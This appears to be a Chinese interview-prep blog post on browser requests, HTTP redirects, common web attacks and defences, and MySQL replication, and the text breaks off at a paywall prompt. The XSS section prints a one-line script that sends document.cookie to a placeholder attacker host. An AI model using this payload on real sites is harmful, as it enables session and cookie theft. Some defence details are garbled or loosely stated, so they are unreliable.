本文涵盖了面试中常见的技术问题,包括浏览器地址访问过程,HTTP到HTTPS的转换,Web安全(如CSRF、XSS、SQL注入)及防御策略,MySQL主从同步的底层机制,Redis集群模式对比,以及如何保证交易接口安全性等。同时,还讨论了PHP、C语言、设计模式等相关知识点。
一、浏览器输入一个地址访问的过程发生了什么 https
1.浏览器URL解析
2.DNS域名解析
3.ip寻址arp地址转换
4.tcp三次握手
5.建立tcp连接后发起http请求
7.服务器响应http请求,浏览器拿到html代码
8.浏览器解析html并请求代码中资源
9.浏览器渲染页面
二、浏览器如何通过HTTP协议跳转到HTTPS协议(301和302的区别)
通过HTTP重定向,常见的
301:永久重定向 搜索引擎保存新的url,后续会请求到新的url
302:临时重定向 搜索引擎还是原来url,后续请求依然原来url
三、常见的web攻击,及防范
1、CSRF:跨站请求伪造,通过伪装成受信任用户的进行访问,用户本地存储cookie,攻击者利用用户的cookie进行认证,然后伪造用户发出请求
预防:1、不使用cookie验证,通过token令牌验证。2、通过referer识别,HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。
2、XSS:跨站脚本攻击,攻击者在网页中嵌入恶意脚本程序,用户输入的数据变成了代码,比如<script>window.open(“www.xxx.com?param=”+document.cookie)</script>将用户的cookie发送到攻击者服务器上。
预防:将输入的数据进行转义处理,比如说讲 < 转义成<;
3、SQL注入:通过sql命令伪装成正常的http请求参数,传递到服务器端,服务器执行sql命令造成对数据库进行攻击
预防:1、SQL预处理语句。2、数据库密码进行加密存储
4、DDOS:分布式拒绝服务攻击,就是发送大量请求是使服务器瘫痪,DDos攻击是在DOS攻击基础上的,可以通俗理解,dos是单挑,而ddos是群殴,因为现代技术的发展,dos攻击的杀伤力降低,所以出现了DDOS,攻击者借助公共网络,将大数量的计算机设备联合起来,向一个或多个目标进行攻击。
预防:1、最直接的方法增加带宽。但是攻击者用各地的电脑进行攻击,他的带宽不会耗费很多钱,但对于服务器来说,带宽非常昂贵。2、云服务提供商有自己的一套完整DDoS解决方案,并且能提供丰富的带宽资源
四、MySQL主从同步数据的底层模式,某个场景
场景:主数据库执行了一条sql语句中包含了mysql时间戳函数,由于网络原因中断了10秒才同步到从数据库,此时同步到从数据库的时间是不是多了10秒
答案不是
Mysql服务器之间的主从同步是基于二进制日志机制,主服务器使用二进制日志来记录数据库的变动情况,从服务器通过读取和执行该日志文件来保持和主服务器的数据一致。
SBR(sql 默认)和RBR (行)
在使用二进制日志时,主服务器的所有操作都会被记录下来,然后从服务器会接收到该日志的一个副本。从服务器可以指定执行该日志中的哪一类事件(譬如只插入数据或者只更新数据),默认会执行日志中的所有语句。
每一个从服务器会记录关于二进制日志的信息:文件名和已经处理过的语句,这样意味着不同的从服务器可以分别执行同一个二进制日志的不同部分,并且从服务器可以随时连接或者中断和服务器的连接。
主服务器和每一个从服务器都必须配置一个唯一的ID号(在my.cnf文件的[mysqld]模块下有一个server-id配置项),另外,每一个从服务器还需要通过CHANGE MASTER TO语句来配置它要连接的主服务器的ip地址,日志文件名称和该日志里面的位置(这些信息存储在主服务器的数据库里)
SBR:当使用二进制日志时,主服务器会把SQL语句写入到日志中,然后从服务器会执行该日志,这就是SBR,在mysql5.1.4之前的版本都只能使用这种格式。使用SBR会有如下
长处:
日志文件更小
记录了所有的语句,可以用来日后审计
弊端:
使用如下函数的语句不能被正确地复制:load_file(); uuid(), uuid_short(); user(); found_rows(); sysdate(); get_lock(); is_free_lock(); is_used_lock(); master_pos_wait(); rand(); release_lock(); sleep(); version();
在日志中出现如下警告信息的不能正确地复制:[Warning] Statement is not safe to log in statement format.
或者在客户端中出现show warnings
Insert … select语句会执行大量的行级锁表
Update语句会执行大量的行级锁表来扫描整个表
2.RBR:主服务器把表的行变化作为事件写入到二进制日志中,主服务器把代表了行变化的事件复制到从服务中,使用RBR的
长处:
所有的数据变化都是被复制,这是最安全的复制方式
更少的行级锁表
弊端:
日志会很大
不能通过查看日志来审计执行过的sql语句,不过可以通过使用mysqlbinlog
--base64-output=decode-rows --verbose来查看数据的 变动
3.MBR:既使用SBR也使用RBR,默认使用SBR
五、如何控制两个sql语句同时执行的影响,以及解决方案,某个场景(锁和队列)
场景:一个账户上由100块钱,每次用户请求去修改账户金额之前都要查询账户金额是否够,假如有两个用户同时对账户进行了修改,MySQL如何解决这种冲突的,有什么其他的解决方案。
1、在执行修改数据之前进行加锁,提交后再释放锁
2、把查询和修改的请求放到一个队列中
1.打开同时锁定表的记录 <
最低0.47元/天 解锁文章
扫一扫
293
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
